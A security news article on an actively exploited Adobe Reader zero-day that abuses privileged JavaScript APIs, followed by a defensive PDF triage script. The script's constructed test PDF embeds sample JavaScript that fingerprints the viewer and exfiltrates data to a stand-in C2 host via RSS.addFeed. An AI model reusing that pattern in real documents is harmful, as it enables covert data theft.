Security researchers have uncovered an actively exploited zero-day vulnerability in Adobe Acrobat Reader that has been weaponized in the wild since at least November 28, 2025 — nearly four months before the flaw was publicly identified. The exploit uses maliciously crafted PDF documents to fingerprint victim systems, bypass sandbox protections, and exfiltrate sensitive data, and no patch is currently available from Adobe.
Discovery
The vulnerability was identified by Haifei Li of EXPMON, a public automated exploit analysis service, on March 26, 2026, after a suspicious PDF named yummy_adobe_exploit_uwu.pdf was submitted to the platform. Li confirmed that the exploit leverages a previously unknown logic flaw and works against the latest version of Adobe Reader with no user interaction required beyond opening the file.
Subsequent analysis identified an earlier sample — Invoice540.pdf — uploaded to VirusTotal on November 28, 2025, and a second sample on March 23, 2026, indicating the campaign had been quietly operating for months before detection.
How the Exploit Works
The attack chain exploits an unpatched logic flaw in Adobe Reader's JavaScript engine that allows untrusted PDF code to invoke privileged Acrobat APIs from within the sandboxed process — a fundamental sandbox bypass.
Attack Chain:
- Delivery — Victim opens a malicious PDF (social engineering implied by file naming)
- Obfuscation — Core exploit script is Base64-encoded and hidden within PDF objects
- Sandbox bypass — JavaScript engine flaw invokes privileged APIs from within sandbox
- Data collection — Calls the privileged `util.readFileIntoStream()` API to read arbitrary local files
- Exfiltration — Calls the `RSS.addFeed()` API to silently transmit the stolen data to the attacker's C2 server
- Filtering — The C2 server returns empty responses to sandbox and analysis environments, delivering real payloads only to genuine victims
The data collected in the initial fingerprinting phase includes:
- Exact operating system version and details
- System language settings
- Adobe Reader version number
- Local file path of the PDF document
This fingerprinting data allows threat actors to profile targeted victims before potentially delivering more destructive follow-on payloads.
Escalation Potential
Li emphasized that the exploit's capabilities extend well beyond initial reconnaissance:
"Even more concerning, this exploit allows the threat actor to not only collect/steal local information but also potentially launch subsequent RCE/SBX attacks, which could lead to full control of the victim's system."
The multi-stage design — fingerprinting first, payload delivery second — is consistent with targeted attack operations that need to verify victim identity before deploying high-value tools that could expose the campaign if deployed broadly.
Targeting Indicators
Independent researcher Gi7w0rm found that lure documents tied to the exploit contain Russian-language content referencing current events in Russia's oil and gas sector. While this does not establish definitive attribution, it suggests the campaign is targeting a specific audience rather than conducting opportunistic mass exploitation.
The targeting profile is consistent with industrial espionage or nation-state reconnaissance operations focused on energy sector entities.
Detection Challenges
A significant concern highlighted by researchers is how poorly traditional antivirus engines are detecting this threat. Samples submitted to VirusTotal showed very low detection rates, meaning most endpoint security tools are not flagging the malicious PDFs.
This is consistent with the exploit-only nature of the attack — the payload is an exploit mechanism, not a traditional malware binary — which means signature-based detection engines struggle to classify the threat.
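Because the malicious content is script rather than a binary, a useful complement to signature engines is static triage of the PDF itself. The following Python script is an added example (it is not code from EXPMON, BleepingComputer or Adobe): it pulls JavaScript out of PDF objects (literal `/JS` strings, hex strings and FlateDecode streams), peels a bounded number of Base64 layers, and flags references to the two privileged APIs named in the report plus outbound URLs. It generalizes beyond the page's single case by handling several encodings rather than one. The PDFs it scans are constructed in the script; the property names in `FINGERPRINT_PROPS` (`app.viewerVersion`, `app.language`, `app.platform`, `this.path`) are an assumption about how Reader JavaScript would read the fingerprint data listed above, and the script is a triage aid, not a detector for the logic flaw itself: it will miss scripts hidden behind filters other than FlateDecode or encodings other than Base64.

```python
"""Static PDF triage for the indicators described in the report.

Added example (not code from EXPMON, BleepingComputer or Adobe). FINGERPRINT_PROPS
is an assumption about how Reader JavaScript would read the reported fingerprint data.
"""
import base64
import binascii
import re
import zlib

# The two privileged Acrobat JavaScript APIs named in the report.
PRIVILEGED_APIS = ("util.readFileIntoStream", "RSS.addFeed")
# Assumption: standard Acrobat JS properties exposing Reader version, UI language,
# platform, and the local path of the open document.
FINGERPRINT_PROPS = ("app.viewerVersion", "app.language", "app.platform", "this.path")
MAX_B64_DEPTH = 3

# A stream and the dictionary before it, without crossing an object boundary.
STREAM_RE = re.compile(rb"(<<(?:(?!endobj).)*?>>)\s*stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# /JS with a literal (...) or hex <...> string. Indirect references are covered by the
# stream pass; balanced unescaped parentheses inside literals are not handled.
JS_LITERAL_RE = re.compile(rb"/JS\s*\(((?:[^()\\]|\\.)*)\)", re.DOTALL)
JS_HEX_RE = re.compile(rb"/JS\s*<([0-9A-Fa-f\s]*)>")
B64_RUN_RE = re.compile(rb"[A-Za-z0-9+/]{32,}={0,2}")
URL_RE = re.compile(rb"https?://[^\s\"'<>)]+")
_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"(": b"(", b")": b")", b"\\": b"\\"}


def unescape_pdf_string(s: bytes) -> bytes:
    """Resolve the common backslash escapes of a PDF literal string."""
    return re.sub(rb"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), s, flags=re.DOTALL)


def decode_stream(dictionary: bytes, raw: bytes) -> bytes:
    """Inflate FlateDecode streams; any other filter is returned undecoded."""
    if b"/FlateDecode" in dictionary:
        try:
            return zlib.decompress(raw)
        except zlib.error:
            return raw
    return raw


def extract_script_blobs(pdf: bytes) -> list:
    """Collect every chunk of the file that could carry JavaScript."""
    blobs = [decode_stream(d, raw) for d, raw in STREAM_RE.findall(pdf)]
    blobs += [unescape_pdf_string(s) for s in JS_LITERAL_RE.findall(pdf)]
    for h in JS_HEX_RE.findall(pdf):
        digits = re.sub(rb"\s", b"", h)
        if len(digits) % 2:  # PDF treats a missing final digit as 0
            digits += b"0"
        blobs.append(bytes.fromhex(digits.decode("ascii")))
    return blobs


def _mostly_text(data: bytes) -> bool:
    return bool(data) and sum(32 <= c < 127 or c in (9, 10, 13) for c in data) / len(data) >= 0.9


def decode_base64_layers(blob: bytes, depth: int = MAX_B64_DEPTH) -> list:
    """Decode Base64 runs that yield printable text, peeling up to `depth` nested layers."""
    layers, frontier = [], [blob]
    for _ in range(depth):
        nxt = []
        for chunk in frontier:
            for run in B64_RUN_RE.findall(chunk):
                try:
                    decoded = base64.b64decode(run, validate=True)
                except (binascii.Error, ValueError):
                    continue
                if _mostly_text(decoded):
                    layers.append(decoded)
                    nxt.append(decoded)
        frontier = nxt
        if not frontier:
            break
    return layers


def scan_pdf(pdf: bytes) -> dict:
    """Return the indicators found across all script blobs and decoded layers, plus a coarse verdict."""
    blobs = extract_script_blobs(pdf)
    layers = [layer for blob in blobs for layer in decode_base64_layers(blob)]
    text = b"\n".join(blobs + layers)
    apis = [a for a in PRIVILEGED_APIS if a.encode() in text]
    props = [p for p in FINGERPRINT_PROPS if p.encode() in text]
    urls = sorted({u.decode("ascii", "replace") for u in URL_RE.findall(text)})
    return {"script_blobs": len(blobs), "base64_layers": len(layers), "privileged_apis": apis,
            "fingerprint_props": props, "urls": urls,
            "verdict": "suspicious" if apis or (props and urls) else "no indicators"}


def build_sample_pdf(js: bytes, compress: bool) -> bytes:
    """Constructed test input: a minimal PDF whose OpenAction runs `js` from a stream object."""
    body = zlib.compress(js) if compress else js
    filt = b" /Filter /FlateDecode" if compress else b""
    objs = [b"<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>",
            b"<< /Type /Pages /Kids [] /Count 0 >>",
            b"<< /S /JavaScript /JS 4 0 R >>",
            b"<< /Length %d%s >>\nstream\n" % (len(body), filt) + body + b"\nendstream"]
    out = b"%PDF-1.7\n"
    for num, obj in enumerate(objs, 1):
        out += b"%d 0 obj\n" % num + obj + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


# Constructed samples. The "suspicious" one merely references the reported APIs so the
# detector has something to find; it is not an exploit and contains no bypass logic.
INNER_JS = (b"var info = [app.viewerVersion, app.language, app.platform, this.path].join('|');\n"
            b"var data = util.readFileIntoStream('/c/users/victim/notes.txt');\n"
            b"RSS.addFeed('http://c2.example.invalid/feed?id=' + info);\n")
LOADER_JS = b'var payload = "' + base64.b64encode(INNER_JS) + b'";\neval(decode(payload));\n'
SUSPICIOUS_PDF = build_sample_pdf(LOADER_JS, compress=True)
BENIGN_PDF = build_sample_pdf(b'app.alert("Thanks for reading");\n', compress=False)

if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS_PDF), ("benign", BENIGN_PDF)):
        print(name, scan_pdf(doc))
```

Run it against a directory of quarantined attachments to pick out candidates for sandbox detonation or submission to EXPMON; the verdict is deliberately coarse (any reference to the privileged APIs, or fingerprint properties combined with a URL) so that it favours review over silence.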
Patch Status
As of April 9, 2026, Adobe has not released a patch for this vulnerability. EXPMON states it has notified Adobe Security and is awaiting their response.
Until a patch is available, security teams should consider:
| Mitigation | Description |
|---|---|
| PDF sandbox hardening | Keep Adobe Reader's Protected Mode and Protected View enabled. Note that this exploit is reported to escape the Protected Mode sandbox, so treat it as defense in depth rather than a fix; Protected View opens untrusted files read-only with active content such as JavaScript blocked until the user explicitly enables all features |
| Disable JavaScript in Reader | Edit → Preferences → JavaScript → uncheck "Enable Acrobat JavaScript". Because the exploit is delivered as PDF JavaScript, this is the most direct mitigation; enterprises can enforce and lock it with the FeatureLockDown policy value bDisableJavaScript = 1 (DWORD) under HKLM\SOFTWARE\Policies\Adobe\<product>\DC\FeatureLockDown. Expect some interactive forms to stop working |
| Alternative PDF readers | Use alternative PDF readers for untrusted documents |
| Submit suspicious PDFs | Use EXPMON's public service to analyze suspect PDF files |
| Email gateway filtering | Increase scrutiny on PDF attachments in email security policies |
| EDR behavioral monitoring | Watch for unusual Adobe Reader API calls and outbound network connections |
Industry Implications
This vulnerability underscores a broader challenge for organizations that rely on PDFs as a core business document format: the attack surface for PDF-based exploits remains significant even with sandboxing enabled, and a dwell time of nearly four months before discovery shows how a targeted campaign can remain undetected in widely deployed enterprise software.
Source: BleepingComputer — Hackers exploiting Acrobat Reader zero-day flaw since December